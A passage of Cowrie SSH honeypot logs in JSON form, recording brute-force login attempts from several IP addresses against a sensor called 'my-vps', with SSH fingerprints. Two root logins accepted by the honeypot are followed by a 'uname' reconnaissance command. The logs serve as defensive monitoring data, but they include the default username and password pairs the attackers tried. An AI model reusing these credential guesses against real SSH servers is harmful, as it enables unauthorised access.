":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:49:25.805291Z","src_ip":"212.227.125.160","session":"8b15024144b3"}
{"eventid":"cowrie.login.failed","username":"priyanka","password":"priyanka","message":"login attempt [priyanka/priyanka] failed","sensor":"my-vps","timestamp":"2025-08-26T11:49:26.275207Z","src_ip":"212.227.125.160","session":"8b15024144b3"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:49:27.329136Z","src_ip":"212.227.125.160","session":"8b15024144b3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41108,"dst_ip":"1.2.3.4","dst_port":22,"session":"7718746e160a","protocol":"ssh","message":"New connection: 212.227.125.160:41108 (1.2.3.4:22) [session: 7718746e160a]","sensor":"my-vps","timestamp":"2025-08-26T11:49:31.654499Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:49:31.655078Z","src_ip":"212.227.125.160","session":"7718746e160a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:49:31.704977Z","src_ip":"212.227.125.160","session":"7718746e160a"}
{"eventid":"cowrie.login.failed","username":"brute","password":"brute","message":"login attempt [brute/brute] failed","sensor":"my-vps","timestamp":"2025-08-26T11:49:31.862400Z","src_ip":"212.227.125.160","session":"7718746e160a"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:49:33.041754Z","src_ip":"212.227.125.160","session":"7718746e160a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41874,"dst_ip":"1.2.3.4","dst_port":22,"session":"6eb1be6398e0","protocol":"ssh","message":"New connection: 212.227.125.160:41874 (1.2.3.4:22) [session: 6eb1be6398e0]","sensor":"my-vps","timestamp":"2025-08-26T11:49:37.280122Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:49:37.286887Z","src_ip":"212.227.125.160","session":"6eb1be6398e0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:49:37.352172Z","src_ip":"212.227.125.160","session":"6eb1be6398e0"}
{"eventid":"cowrie.login.failed","username":"data","password":"data","message":"login attempt [data/data] failed","sensor":"my-vps","timestamp":"2025-08-26T11:49:37.533908Z","src_ip":"212.227.125.160","session":"6eb1be6398e0"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":33724,"dst_ip":"1.2.3.4","dst_port":22,"session":"0fdd8cfabf25","protocol":"ssh","message":"New connection: 83.168.105.65:33724 (1.2.3.4:22) [session: 0fdd8cfabf25]","sensor":"my-vps","timestamp":"2025-08-26T11:49:37.718645Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:49:37.719325Z","src_ip":"83.168.105.65","session":"0fdd8cfabf25"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:49:37.756622Z","src_ip":"83.168.105.65","session":"0fdd8cfabf25"}
{"eventid":"cowrie.login.success","username":"root","password":"4e2q1w3r","message":"login attempt [root/4e2q1w3r] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:49:37.869390Z","src_ip":"83.168.105.65","session":"0fdd8cfabf25"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:49:38.008072Z","src_ip":"83.168.105.65","session":"0fdd8cfabf25"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:49:38.008817Z","src_ip":"83.168.105.65","session":"0fdd8cfabf25"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:49:38.047282Z","src_ip":"83.168.105.65","session":"0fdd8cfabf25"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:49:38.048459Z","src_ip":"83.168.105.65","session":"0fdd8cfabf25"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:49:38.588527Z","src_ip":"212.227.125.160","session":"6eb1be6398e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42644,"dst_ip":"1.2.3.4","dst_port":22,"session":"9dfbb0502b60","protocol":"ssh","message":"New connection: 212.227.125.160:42644 (1.2.3.4:22) [session: 9dfbb0502b60]","sensor":"my-vps","timestamp":"2025-08-26T11:49:42.633399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:49:42.640507Z","src_ip":"212.227.125.160","session":"9dfbb0502b60"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:49:42.693252Z","src_ip":"212.227.125.160","session":"9dfbb0502b60"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123","message":"login attempt [postgres/123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:49:42.923073Z","src_ip":"212.227.125.160","session":"9dfbb0502b60"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:49:44.133985Z","src_ip":"212.227.125.160","session":"9dfbb0502b60"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43416,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3a8f8763bf7","protocol":"ssh","message":"New connection: 212.227.125.160:43416 (1.2.3.4:22) [session: e3a8f8763bf7]","sensor":"my-vps","timestamp":"2025-08-26T11:49:48.456609Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:49:48.457774Z","src_ip":"212.227.125.160","session":"e3a8f8763bf7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:49:48.512186Z","src_ip":"212.227.125.160","session":"e3a8f8763bf7"}
{"eventid":"cowrie.login.failed","username":"o3-root","password":"o3-root","message":"login attempt [o3-root/o3-root] failed","sensor":"my-vps","timestamp":"2025-08-26T11:49:48.945491Z","src_ip":"212.227.125.160","session":"e3a8f8763bf7"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:49:50.012249Z","src_ip":"212.227.125.160","session":"e3a8f8763bf7"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":37684,"dst_ip":"1.2.3.4","dst_port":22,"session":"47bda6ad33a6","protocol":"ssh","message":"New connection: 196.251.86.249:37684 (1.2.3.4:22) [session: 47bda6ad33a6]","sensor":"my-vps","timestamp":"2025-08-26T11:49:50.887926Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:49:51.770271Z","src_ip":"196.251.86.249","session":"47bda6ad33a6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:49:51.771247Z","src_ip":"196.251.86.249","session":"47bda6ad33a6"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":51220,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb69291ff9e9","protocol":"ssh","message":"New connection: 83.168.105.65:51220 (1.2.3.4:22) [session: eb69291ff9e9]","sensor":"my-vps","timestamp":"2025-08-26T11:49:53.303696Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:49:53.304388Z","src_ip":"83.168.105.65","session":"eb69291ff9e9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:49:53.343774Z","src_ip":"83.168.105.65","session":"eb69291ff9e9"}
{"eventid":"cowrie.login.failed","username":"flask","password":"flask123","message":"login attempt [flask/flask123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:49:53.463074Z","src_ip":"83.168.105.65","session":"eb69291ff9e9"}
{"eventid":"cowrie.login.failed","username":"git","password":"pass","message":"login attempt [git/pass] failed","sensor":"my-vps","timestamp":"2025-08-26T11:49:54.368583Z","src_ip":"196.251.86.249","session":"47bda6ad33a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44188,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b677b6a6ca1","protocol":"ssh","message":"New connection: 212.227.125.160:44188 (1.2.3.4:22) [session: 5b677b6a6ca1]","sensor":"my-vps","timestamp":"2025-08-26T11:49:54.408237Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:49:54.409088Z","src_ip":"212.227.125.160","session":"5b677b6a6ca1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:49:54.463677Z","src_ip":"212.227.125.160","session":"5b677b6a6ca1"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:49:54.504866Z","src_ip":"83.168.105.65","session":"eb69291ff9e9"}
{"eventid":"cowrie.login.failed","username":"esroot","password":"esroot","message":"login attempt [esroot/esroot] failed","sensor":"my-vps","timestamp":"2025-08-26T11:49:54.641880Z","src_ip":"212.227.125.160","session":"5b677b6a6ca1"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:49:55.859276Z","src_ip":"212.227.125.160","session":"5b677b6a6ca1"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:49:55.880798Z","src_ip":"196.251.86.249","session":"47bda6ad33a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44958,"dst_ip":"1.2.3.4","dst_port":22,"session":"b398cd31146c","protocol":"ssh","message":"New connection: 212.227.125.160:44958 (1.2.3.4:22) [session: b398cd31146c]","sensor":"my-vps","timestamp":"2025-08-26T11:49:59.953300Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:49:59.954261Z","src_ip":"212.227.125.160","session":"b398cd31146c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:50:00.003933Z","src_ip":"212.227.125.160","session":"b398cd31146c"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:50:00.168578Z","src_ip":"212.227.125.160","session":"b398cd31146c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:50:00.282846Z","src_ip":"212.227.125.160","session":"b398cd31146c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:50:00.283511Z","src_ip":"212.227.125.160","session":"b398cd31146c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:50:00.335664Z","src_ip":"212.227.125.160","session":"b398cd31146c"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:50:00.336835Z","src_ip":"212.227.125.160","session":"b398cd31146c"}
